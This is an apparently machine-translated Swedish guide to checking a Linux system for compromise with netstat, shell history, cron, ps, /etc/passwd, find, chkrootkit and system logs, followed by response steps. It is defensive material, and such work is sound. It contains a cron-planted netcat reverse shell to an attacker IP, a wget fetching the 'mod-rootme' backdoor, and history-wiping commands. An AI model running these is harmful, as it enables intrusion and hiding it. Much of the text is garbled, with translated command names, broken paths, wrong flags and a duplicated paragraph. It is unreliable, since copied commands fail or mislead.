Hur man avgör om ett Linux-system äventyras

Det finns många anledningar till varför en hackare skulle komma in i ditt system och orsaka allvarliga problem. För många år sedan var det kanske att visa upp sina färdigheter, men nuförtiden kan avsikterna bakom sådana aktiviteter vara mycket mer komplicerade med mycket mer vidsträckta konsekvenser för offret. Detta kanske låter uppenbart, men bara för att "allt verkar bra" betyder det inte att allt är bra. Hackare kan tränga in i ditt system utan att meddela dig och infektera det med skadlig kod för att ta full kontroll, och även för sidorörelse mellan system. Skadlig programvara kan döljas i systemet och fungerar som en bakdörr eller ett Command & Control-system för hackare att utföra skadliga aktiviteter på ditt system.Det är bättre att vara säker än ledsen. Du kanske inte omedelbart inser att ditt system har hackats, men det finns några sätt på vilka du kan avgöra om ditt system är komprometterat. Den här artikeln kommer att diskutera hur man avgör om din Linux systemet har äventyrats av en obehörig person eller en bot loggar in på ditt system för att utföra skadliga aktiviteter.

Netstat

Netstat är ett viktigt TCP / IP-nätverksverktyg på kommandoraden som ger information och statistik om protokoll som används och aktiva nätverksanslutningar.

Vi kommer använda netstat på ett exempel på en offermaskin för att söka efter något misstänkt i de aktiva nätverksanslutningarna via följande kommando:

[e-postskyddad]: ~ $ netstat -antp

Här ser vi alla för närvarande aktiva anslutningar. Nu ska vi leta efter en anslutning som inte borde vara där.

Här är det, en aktiv anslutning på PORT 44999 (en port som inte ska vara öppen).Vi kan se andra detaljer om anslutningen, till exempel PID, och programnamnet det körs i den sista kolumnen. I det här fallet PID är 1555 och den skadliga nyttolast den körs är ./skal.älva fil.

Ett annat kommando för att kontrollera portarna som för närvarande lyssnar och är aktiva på ditt system är följande:

[e-postskyddad]: ~ $ netstat -la

Det här är ganska rörigt. För att filtrera bort lyssnande och etablerade anslutningar använder vi följande kommando:

[e-postskyddad: ~ $ netstat -la | grep “LISTEN” “ESTABLISHED”

Detta ger dig bara de resultat som är viktiga för dig, så att du lättare kan sortera igenom dessa resultat. Vi kan se en aktiv anslutning på port 44999 i ovanstående resultat.

Efter att ha känt igen den skadliga processen kan du döda processen med följande kommandon. Vi kommer att notera PID av processen med kommandot netstat och döda processen via följande kommando:

[e-postskyddad]: ~ $ kill 1555

~.bash-historia

Linux registrerar vilka användare som är inloggade i systemet, från vilken IP, när och hur länge.

Du kan komma åt denna information med sista kommando. Resultatet av detta kommando ser ut som följer:

[e-postskyddad]: ~ $ senast

Utgången visar användarnamnet i första kolumnen, Terminal i den andra, källadressen i den tredje, inloggningstiden i den fjärde kolumnen och den totala sessionstiden loggad i den sista kolumnen. I det här fallet, användarna usman och ubuntu är fortfarande inloggad. Om du ser en session som inte är auktoriserad eller ser skadlig ut, hänvisa till det sista avsnittet i den här artikeln.

Logghistoriken lagras i ~.bash-historia fil. Så historiken kan enkelt tas bort genom att ta bort .bash-historia fil. Denna åtgärd utförs ofta av angripare för att täcka sina spår.

[e-postskyddad]: ~ $ cat .bash_history

Det här kommandot visar kommandona som körs på ditt system, med det senaste kommandot som utförs längst ner i listan.

Historiken kan rensas med följande kommando:

[e-postskyddad]: ~ $ history -c

Detta kommando raderar bara historiken från terminalen du använder för närvarande. Så det finns ett mer korrekt sätt att göra detta:

[e-postskyddad]: ~ $ cat / dev / null> ~ /.bash_history

Detta rensar innehållet i historiken men håller filen på plats. Så om du bara ser din nuvarande inloggning efter att ha kört sista kommando, det här är inte ett bra tecken alls. Detta indikerar att ditt system kan ha äventyrats och att angriparen förmodligen raderade historiken.

Om du misstänker en skadlig användare eller IP, logga in som användaren och kör kommandot historia, som följer:

[e-postskyddad]: ~ $ su
[e-postskyddad]: ~ $ historik

Detta kommando visar kommandohistoriken genom att läsa filen .bash-historia i /Hem mappen för den användaren. Leta försiktigt efter wget, ringla, eller netcat kommandon, om angriparen använde dessa kommandon för att överföra filer eller för att installera från repo-verktyg, till exempel krypto-gruvarbetare eller spam-bots.

Ta en titt på exemplet nedan:

Ovan kan du se kommandot “wget https: // github.com / sajith / mod-rootme.” I det här kommandot försökte hackaren komma åt en fil utan repo med wget för att ladda ner en bakdörr som heter “mod-root me” och installera den på ditt system. Detta kommando i historien innebär att systemet är äventyrat och har blivit bakdörr av en angripare.

Kom ihåg att den här filen lätt kan utvisas eller dess ämne produceras. Uppgifterna från detta kommando får inte tas som en klar verklighet. Men i fallet att angriparen körde ett "dåligt" kommando och försummat evakuera historien, kommer det att vara där.

Cron Jobb

Cron-jobb kan fungera som ett viktigt verktyg när de är konfigurerade för att ställa in ett omvänd skal på angriparmaskinen. Att redigera cron-jobb är en viktig färdighet, och det är också att veta hur man ser dem.

För att se cron-jobb som körs för den aktuella användaren använder vi följande kommando:

[e-postskyddad]: ~ $ crontab -l

För att se cron-jobb som körs för en annan användare (i det här fallet Ubuntu) använder vi följande kommando:

[e-postskyddad]: ~ $ crontab -u ubuntu -l

För att visa cronjobb dagligen, per timme, vecka och månad, använder vi följande kommandon:

Dagliga Cron-jobb:

[e-postskyddad]: ~ $ ls -la / etc / cron.dagligen

Cron jobb per timme:

[e-postskyddad]: ~ $ ls -la / etc / cron.varje timme

Cron jobb varje vecka:

[e-postskyddad]: ~ $ ls -la / etc / cron.varje vecka

Ta ett exempel:

Angriparen kan sätta in ett cron-jobb / etc / crontab som kör ett skadligt kommando 10 minuter över varje timme. Angriparen kan också köra en skadlig tjänst eller en omvänd skal bakdörr via netcat eller något annat verktyg. När du kör kommandot $ ~ crontab -l, du kommer att se ett cron-jobb som körs under:

[e-postskyddad]: ~ $ crontab -l
CT = $ (crontab -l)
CT = $ CT $ '\ n10 * * * * nc -e / bin / bash 192.168.8.131 44999 '
printf "$ CT" | crontab -
ps aux

För att korrekt kontrollera om ditt system har äventyrats är det också viktigt att se pågående processer. Det finns fall där vissa obehöriga processer inte förbrukar tillräckligt med CPU-användning för att listas i topp kommando. Det är där vi kommer att använda ps kommando för att visa alla processer som för närvarande körs.

[e-postskyddad]: ~ $ ps auxf

Den första kolumnen visar användaren, den andra kolumnen visar ett unikt process-ID och CPU- och minnesanvändning visas i nästa kolumner.

Denna tabell ger dig mest information. Du bör inspektera varje pågående process för att leta efter något som är speciellt att veta om systemet är komprometterat eller inte. Om du hittar något misstänkt, Google eller kör det med lsof som visas ovan. Det här är en bra vana att springa ps kommandon på din server och det kommer att öka dina chanser att hitta något misstänkt eller som inte är i din dagliga rutin.

/ etc / passwd

De / etc / passwd filen håller reda på alla användare i systemet. Detta är en kolonavgränsad fil som innehåller information som användarnamn, användar-ID, krypterat lösenord, GroupID (GID), fullständigt namn på användaren, användarens hemkatalog och inloggningsskal.

Om en angripare hackar in i ditt system finns det en möjlighet att han eller hon kommer att skapa några fler användare, för att hålla saker åtskilda eller skapa en bakdörr i ditt system för att komma tillbaka med den bakdörren. När du kontrollerar om ditt system har äventyrats bör du också verifiera alla användare i / etc / passwd-filen. Skriv följande kommando för att göra det:

[e-postskyddad]: ~ $ cat etc / passwd

Detta kommando ger dig en utdata som liknar den nedan:

gnome-initial-setup: x: 120: 65534 :: / run / gnome-initial-setup /: / bin / false
gdm: x: 121: 125: Gnome Display Manager: / var / lib / gdm3: / bin / false
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: PostgreSQL-administratör ,,,: / var / lib / postgresql: / bin / bash
debian-tor: x: 123: 129 :: / var / lib / tor: / bin / false
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
lightdm: x: 125: 132: Light Display Manager: / var / lib / lightdm: / bin / false
Debian-gdm: x: 124: 131: Gnome Display Manager: / var / lib / gdm3: / bin / false
anonym: x: 1002: 1002: ,,,: / hem / anonym: / bin / bash

Nu vill du leta efter alla användare som du inte känner till. I det här exemplet kan du se en användare i filen som heter ”anonym.”En annan viktig sak att notera är att om angriparen skapade en användare att logga in med, kommer användaren också att tilldelas ett“ / bin / bash ”-skal. Så du kan begränsa din sökning genom att ta tag i följande resultat:

[e-postskyddad]: ~ $ cat / etc / passwd | grep -i "/ bin / bash"
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: PostgreSQL-administratör ,,,: / var / lib / postgresql: / bin / bash
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
anonym: x: 1002: 1002: ,,,: / hem / anonym: / bin / bash

Du kan utföra ytterligare "bash-magi" för att förfina din produktion.

[e-postskyddad]: ~ $ cat / etc / passwd | grep -i "/ bin / bash" | klipp -d ":" -f 1
usman
postgres
ubuntu
anonym

Hitta

Tidsbaserade sökningar är användbara för snabb triage. Användaren kan också ändra tidsstämplar för filändring. För att förbättra tillförlitligheten, inkludera ctime i kriterierna, eftersom det är mycket svårare att manipulera eftersom det kräver modifiering av vissa nivåfiler.

Du kan använda följande kommando för att hitta filer som har skapats och ändrats under de senaste fem dagarna:

[e-postskyddad]: ~ $ hitta / -mtime -o -ctime -5

För att hitta alla SUID-filer som ägs av roten och för att kontrollera om det finns några oväntade poster i listorna använder vi följande kommando:

[e-postskyddad]: ~ $ hitta / -perm -4000 -användarrot -typ f

För att hitta alla SGID-filer (set user ID) som ägs av roten och kontrollera om det finns några oväntade poster i listorna använder vi följande kommando:

[e-postskyddad]: ~ $ hitta / -perm -6000 -typ f

Chkrootkit

Rootkits är en av de värsta saker som kan hända med ett system och är en av de farligaste attackerna, farligare än skadlig kod och virus, både i skadorna de orsakar på systemet och svårigheter att hitta och upptäcka dem.

De är utformade på ett sådant sätt att de förblir dolda och gör skadliga saker som att stjäla kreditkort och onlinebankinformation. Rootkits ge cyberbrottslingar möjlighet att kontrollera ditt datorsystem. Rootkits hjälper också angriparen att övervaka dina tangenttryckningar och inaktivera ditt antivirusprogram, vilket gör det ännu enklare att stjäla din privata information.

Dessa typer av skadlig kod kan stanna kvar på ditt system länge utan att användaren ens märker det och kan orsaka allvarliga skador. När Rootkit detekteras finns det inget annat sätt än att installera om hela systemet. Ibland kan dessa attacker till och med orsaka maskinvarufel.

Lyckligtvis finns det några verktyg som kan hjälpa till att upptäcka Rootkits på Linux-system, såsom Lynis, Clam AV eller LMD (Linux Malware Detect). Du kan kontrollera om ditt system är känt Rootkits med hjälp av kommandona nedan.

Installera först Chkrootkit via följande kommando:

[e-postskyddad]: ~ $ sudo apt installera chkrootkit

Detta kommer att installera Chkrootkit verktyg. Du kan använda detta verktyg för att söka efter Rootkits via följande kommando:

[e-postskyddad]: ~ $ sudo chkrootkit

Chkrootkit-paketet består av ett skalskript som kontrollerar systembinarier för rootkit-modifiering, samt flera program som söker efter olika säkerhetsproblem. I ovanstående fall kollade paketet efter ett tecken på Rootkit på systemet och hittade inget. Det är ett bra tecken!

Linux-loggar

Linux-loggar ger en tidtabell för händelser i Linux-arbetsramen och applikationer, och är ett viktigt utredningsinstrument när du upplever problem. Den primära uppgiften som en administratör behöver utföra när han eller hon upptäcker att systemet är komprometterat bör dissekera alla loggposter.

För specifika problem med arbetsområdesapplikationer hålls loggposter i kontakt med olika områden. Till exempel komponerar Chrome kraschrapporter till '~ /.krom / kraschrapporter '), där en arbetsområdeapplikation komponerar loggar som är beroende av ingenjören och visar om applikationen tar hänsyn till anpassad loggordning. Rekord finns i/ var / log katalog. Det finns Linux-loggar för allt: ramverk, del, buntchefer, startformulär, Xorg, Apache och MySQL. I den här artikeln kommer temat att koncentreras uttryckligen på Linux-ramloggar.

Du kan byta till den här katalogen med hjälp av CD-ordningen. Du bör ha rootbehörigheter för att visa eller ändra loggfiler.

[e-postskyddad]: ~ $ cd / var / log

Instruktioner för att visa Linux-loggar

Använd följande kommandon för att se de nödvändiga loggdokumenten.

Linux-loggar kan ses med kommandot cd / var / log, vid den tidpunkten genom att komponera beställningen för att se stockarna placerade under denna katalog. En av de viktigaste stockarna är syslog, som loggar många viktiga loggar.

ubuntu @ ubuntu: katt syslog

För att desinficera produktionen använder vimindre" kommando.

ubuntu @ ubuntu: katt syslog | mindre

Skriv kommandot var / log / syslog att se en hel del saker under syslog-fil. Att fokusera på en viss fråga tar lite tid, eftersom denna post vanligtvis är lång. Tryck på Skift + G för att bläddra ner i posten till SLUT, betecknad med “SLUT.”

Du kan också se loggarna med hjälp av dmesg, som skriver ut delringen. Denna funktion skriver ut allt och skickar dig så långt som möjligt längs dokumentet. Från den tiden kan du använda beställningen dmesg | mindre att titta igenom avkastningen. Om du behöver se loggarna för den givna användaren måste du köra följande kommando:

dmesg - anläggning = användare

Sammanfattningsvis kan du använda svansordningen för att se loggdokumenten. Det är ett litet men ändå användbart verktyg som man kan använda, eftersom det används för att visa den sista delen av loggarna, där problemet troligen uppstod. Du kan också ange antalet senaste byte eller rader som ska visas i svanskommandot. För detta använder du kommandot svans / var / log / syslog. Det finns många sätt att titta på loggar.

För ett visst antal rader (modellen tar hänsyn till de senaste 5 raderna), ange följande kommando:

[e-postskyddad]: ~ $ tail -f -n 5 / var / log / syslog

Detta kommer att skriva ut de senaste 5 raderna. När en ny rad kommer kommer den förra att evakueras. För att komma bort från svansordningen, tryck Ctrl + X.

Viktiga Linux-loggar

De fyra primära Linux-loggarna inkluderar:

Applikationsloggar
Händelseloggar
Serviceloggar
Systemloggar

ubuntu @ ubuntu: katt syslog | mindre

/ var / log / syslog eller / var / log / meddelanden: allmänna meddelanden, precis som ramrelaterade data. Den här loggen lagrar all åtgärdsinformation över hela världen.

ubuntu @ ubuntu: kattautent.logg | mindre

/ var / log / auth.logga eller / var / log / säker: lagra verifieringsloggar, inklusive både effektiva och fizzled-inloggningar och valideringsstrategier. Debian och Ubuntu används / var / log / auth.logga för att lagra inloggningsförsök, medan Redhat och CentOS använder / var / log / säker för att lagra autentiseringsloggar.

ubuntu @ ubuntu: kattkänga.logg | mindre

/ var / log / boot.logga: innehåller information om start och meddelanden under start.

ubuntu @ ubuntu: cat maillog | mindre

/ var / log / maillog eller / var / log / mail.logga: lagrar alla loggar som identifierats med e-postservrar; värdefullt när du behöver data om postfix, smtpd eller andra e-postrelaterade administrationer som körs på din server.

ubuntu @ ubuntu: kattkärna | mindre

/ var / log / kern: innehåller information om kärnloggar. Den här loggen är viktig för att undersöka anpassade delar.

ubuntu @ ubuntu: katt dmesg | mindre

/ var / log / dmesg: innehåller meddelanden som identifierar gadgetdrivrutiner. Ordern dmesg kan användas för att se meddelanden i denna post.

ubuntu @ ubuntu: cat faillog | mindre

/ var / log / faillog: innehåller data om alla inblandade inloggningsförsök, värdefulla för att plocka upp kunskapsbitar om försökta säkerhetsgenomträngningar; till exempel de som vill hacka inloggningscertifieringar, precis som angrepp på djurmakt.

ubuntu @ ubuntu: cat cron | mindre

/ var / log / cron: lagrar alla Cron-relaterade meddelanden; cron-anställningar, till exempel, eller när cron-demon startade en kallelse, relaterade besvikelsemeddelanden och så vidare.

ubuntu @ ubuntu: cat yum.logg | mindre

/ var / log / yum.logga: på chansen att du introducerar buntar som använder yum-ordningen, lagrar den här loggen all relaterad data, vilket kan vara till hjälp för att avgöra om en bunt och alla segment infördes effektivt.

ubuntu @ ubuntu: katt httpd | mindre

/ var / log / httpd / eller / var / log / apache2: dessa två kataloger används för att lagra alla typer av loggar för en Apache HTTP-server, inklusive åtkomstloggar och felloggar. Error_log-filen innehåller alla dåliga förfrågningar som tas emot av http-servern. Dessa misstag innehåller minnesfrågor och andra ramrelaterade misstag. Access_log innehåller ett register över alla begäranden som tas emot via HTTP.

ubuntu @ ubuntu: katt mysqld.logg | mindre

/ var / log / mysqld.logga eller/ var / log / mysql.logga : MySQL-loggdokumentet som loggar alla fel-, felsöknings- och framgångsmeddelanden. Detta är en annan händelse där ramverket riktar sig till registret; RedHat, CentOS, Fedora och andra RedHat-baserade ramar använder / var / log / mysqld.logg, medan Debian / Ubuntu använder / var / log / mysql.loggkatalog.

Verktyg för att visa Linux-loggar

Det finns många öppna källkodspårare och undersökningsenheter tillgängliga idag, vilket gör det enklare att välja rätt tillgångar för åtgärdsloggar än du kanske misstänker. Loggkontrollerna med fri och öppen källkod kan arbeta på vilket system som helst för att få jobbet gjort. Här är fem av de bästa jag har använt tidigare, i ingen specifik ordning.

GRÅLOGG

Startade i Tyskland 2011, och nu erbjuds Graylog antingen som en öppen källkod eller ett affärsarrangemang. Graylog är tänkt att vara ett samlat, logg-in-board-ramverk som tar emot informationsströmmar från olika servrar eller slutpunkter och tillåter dig att snabbt granska eller bryta ned data.

Graylog har samlat en positiv notoritet bland ramhuvuden som ett resultat av dess enkelhet och mångsidighet. De flesta webbprojekt börjar lite, men kan ändå utvecklas exponentiellt. Graylog kan justera stackar över ett system med backend-servrar och hantera några terabyte logginformation varje dag.

IT-ordförande kommer att se framsidan av GrayLog-gränssnittet som enkel att använda och kraftfull i dess användbarhet. Graylog arbetar kring tanken med instrumentpaneler, som tillåter användare att välja vilken typ av mätningar eller informationskällor de tycker är viktiga och snabbt observera lutningar efter en tid.

När ett säkerhets- eller exekveringsepisod inträffar måste IT-ordförande ha möjlighet att följa manifestationerna till en underliggande förare så snabbt som rimligt kan förväntas. Graylogs sökfunktion gör den här uppgiften enkel. Detta verktyg har fungerat för att anpassa sig till internt fel som kan köra flera strängade satsningar så att du kan bryta ner några potentiella faror tillsammans.

NAGIOS

Nagios startades av en enda utvecklare 1999 och har sedan dess utvecklats till ett av de mest solida open source-instrumenten för att övervaka logginformation. Den nuvarande återgivningen av Nagios kan implementeras på servrar som kör alla typer av operativsystem (Linux, Windows, etc.).

Nagios viktiga artikel är en loggserver som effektiviserar informationssortimentet och gör data successivt tillgängliga för ramledare. Nagios loggserversmotor kommer att fånga information gradvis och mata den till ett banbrytande sökinstrument. Att integrera med en annan slutpunkt eller applikation är en enkel dricksvärdighet för denna inneboende arrangemangsguide.

Nagios används ofta i föreningar som behöver screena säkerheten i sina stadsdelar och kan granska en mängd systemrelaterade tillfällen för att hjälpa till att robotisera förmedlingen av varningar. Nagios kan programmeras för att utföra specifika uppgifter när ett visst villkor är uppfyllt, vilket gör det möjligt för användare att upptäcka problem även innan en människas behov inkluderas.

Som en viktig aspekt av systemutvärderingen kommer Nagios att kanalisera logginformation beroende på det geografiska område där den startar. Kompletta instrumentpaneler med kartläggningsinnovation kan implementeras för att se strömning av webbtrafik.

LOGALYSERA

Logalyze tillverkar verktyg för öppen källkod för ramdirektörer eller systemadministratörer och säkerhetsspecialister för att hjälpa dem med att övervaka serverloggar och låta dem fokusera på att förvandla loggarna till värdefull information. Verktygets väsentliga sak är att det är tillgängligt som en gratis nedladdning för antingen hem eller företag.

Nagios viktiga artikel är en loggserver som effektiviserar informationssortiment och gör data successivt tillgängliga för ramchefer. Nagios loggserversmotor kommer att fånga information gradvis och mata den till ett banbrytande sökinstrument. Att integrera med en annan slutpunkt eller applikation är en enkel dricksvärdighet för denna inneboende arrangemangsguide.

Vad ska du göra om du har äventyrats?

Det viktigaste är att inte få panik, särskilt om den obehöriga personen är inloggad just nu. Du bör ha möjlighet att ta tillbaka kontrollen över maskinen innan den andra personen vet att du känner till dem. Om de vet att du är medveten om deras närvaro kan angriparen mycket väl hålla dig borta från din server och börja förstöra ditt system. Om du inte är så teknisk är allt du behöver göra att stänga av hela servern omedelbart. Du kan stänga av servern via följande kommandon:

[e-postskyddad]: ~ $ avstängning -h nu

Eller

[e-postskyddad]: ~ $ systemctl avstängning

Ett annat sätt att göra detta är att logga in på din värdleverantörs kontrollpanel och stänga av den därifrån. När servern är avstängd kan du arbeta med de brandväggsregler som behövs och konsultera vem som helst för hjälp på din egen tid.

Om du känner dig mer säker och din webbhotell har en uppströms brandvägg, skapa och aktivera sedan följande två regler:

Tillåt SSH-trafik från endast din IP-adress.
Blockera allt annat, inte bara SSH utan alla protokoll som körs på varje port.

Använd följande kommando för att söka efter aktiva SSH-sessioner:

[e-postskyddad]: ~ $ ss | grep ssh

Använd följande kommando för att döda deras SSH-session:

[e-postskyddad]: ~ $ kill

Detta dödar deras SSH-session och ger dig tillgång till servern. Om du inte har tillgång till en uppströms brandvägg måste du skapa och aktivera brandväggsreglerna på själva servern. Då, när brandväggsreglerna är inställda, dödar den obehöriga användarens SSH-session via kommandot “kill”.

En sista teknik, där tillgänglig, logga in på servern med hjälp av en out-of-band-anslutning, såsom en seriekonsol. Stoppa allt nätverk via följande kommando:

[e-postskyddad]: ~ $ systemctl stoppar nätverket.service

Detta kommer att helt stoppa att alla system kommer till dig, så att du nu skulle kunna aktivera brandväggskontrollerna på din egen tid.

När du har fått tillbaka kontrollen över servern, lita inte lätt på den. Försök inte fixa saker och återanvända dem. Det som går sönder kan inte åtgärdas. Du skulle aldrig veta vad en angripare kunde göra, och du borde aldrig vara säker på att servern är säker. Så ominstallation bör vara ditt sista steg.